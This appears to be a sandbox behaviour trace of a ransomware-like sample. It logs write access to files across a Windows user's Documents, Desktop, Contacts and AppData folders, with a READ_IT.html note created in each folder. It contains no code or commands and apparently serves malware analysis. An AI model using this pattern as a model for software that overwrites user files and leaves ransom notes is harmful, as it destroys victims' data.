Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\OqsQkgPVws2KW2MpHE.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\qIuknaouCKsmM3Maz2V.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\s6260jDRMgooK.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\sQKXNIbjSAzGvmyd0_f7.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\TXfqtchH6vI5EBg.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\Uh0MOTMwnhM5QslZdVd.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\YT_fj.xls	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\ZLfwPJ6yOGMDVqlfby.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\ZUZT.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\Zwzadzoagi.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\-nbcCfzcdJQ2dV.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\6iTDz.odt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\9sLzlMyOCFuH.csv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\DF4IZiIv.pdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\DMOsRy5Ljk1e.pps	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\FwX_09l7qc-etEisqd.pdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\nJPRm.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\nnLb8RrQDHzYuf.ots	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\y8GsAYdXEKW3KVw.xls	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\_cbDdOfFkXKNKHz\_lUS5mT.csv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\4pMiQOPz.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\9h2Uw8T.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\BdJci4eewA.csv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\DD1sMMlGPoF6yRDJyx9.ots	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\e5i9jnq7jdi.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\kZfCP7 _wOFu.csv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\LbzcMZQLnz3pq.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\lp4J8.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\mOLcdbxRsE.csv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\N5xQKlDg2wkPmIcJRs.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\Rdvc-2Q3oAz99.ots	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\zExpZ8SANMxx\sMAa1L-IqK.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\Outlook Files\jvueuh@djeu.com.pst	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\Outlook Files\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\My Shapes\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\My Shapes\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\My Shapes\Favorites.vss	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\My Shapes\_private\folder.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\My Shapes\_private\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\-lci4LWlsWG.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\1yykkWcOcMO1F.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\69234490.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\8uQGY6g-zZe55.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\cgtxGTbWp T.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\CUp25E2.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\E80xfN6BEp.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\fwmoz.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\GnTW32T.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\GvX_LajpHYJjfM.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\HdUfR3zPYGx.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\igCOsJDRZ4j2G1IZw.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\jgRzkhn.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\L9PmyHtkERxj.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\NKSXW.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\Nyr8aiKjyEFl.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\o3YC8FdDp.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\p8fQECmj7Fl OF85VPf.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\R-vsD.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\S0BfBv4vm.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\TQbrwrS.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\Ue-5ySQ.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\wDgOCV.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\XGIwR5NL7Yf.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\xVd4Iv6FFRlHm-y.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\XygQlHZL_mJ.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\yVOJ0 snGOZEZV.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\zmhb.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\ZXoBFBOcUzmMPH9OMtZs.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\_bryI2jV2VxGI68s0d.odt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\PJQ-Ty1kQqwR93pNDG\-RTPz3hqk.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\PJQ-Ty1kQqwR93pNDG\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\PJQ-Ty1kQqwR93pNDG\4rUxzvGW0OpQV4gw u5n.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\PJQ-Ty1kQqwR93pNDG\BXbEGs1IeVQlccK0F.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\PJQ-Ty1kQqwR93pNDG\JvRr.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\3u3u7kCTHK.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\adbgirUxyBMJq0pOiu.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\LopyK.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\LX2vm0PVBOBNtWI6.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\Mg9jqOZ12EhB4-HjFEm.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\p_1CkonjrNXGCwkIn3j.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\52bI-hhJ3zFu3m69\RKQ9HZgpCj5.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\Aclviho ASldjfl.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\Administrator.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\asdlfk poopvy.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\chucu jadnvk.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\lulcit amkdfe.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Contacts\sikvnb huvuib.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\4 dKhm4.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\5QQe5_.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\67_x5gea.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\7IQFQytHlLfaVT6G.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\7Rx_YFPI7G6.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\92wAZIT1y.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\BcucTO-lsFxXF.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\beN0t.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\BHMU64hzOdeWD -0.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\buTh4KTP4lymd-8Q.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\cgt di.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\CPqQ dVCpdsx.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\DhyiEQ4Xj.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\E1787L5.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\EEfzaM7d2YAF.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\ezu8il U5Yn6C.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\fKtkyR 1-OP.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\i1LzIzrV0t.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\jhB5.pdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\JT0 nHyxkAPSaoLmKv0R.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\K28I44Cu.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\K9OSgOmlj6mb.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\ktjahCujmY.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\kyIh4_jik6uQrR9hn.csv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\MGacSuRE6 J9_.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\mMlPxJAH5t3ZDP-AfXP.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\oFWyT_.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\QOQ-s.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\tqQHus T.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\u-tFp_dSKAw4.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\UbiKXV.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\ud83q.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\uTyOJB3M3.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Vzxp5zim2Nc.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Wgrgh-5PaoXJURuexKk.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\z8sSR5 Fp7wKkj1aRuZ.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\zEsTq08NWkN.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\profiles.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
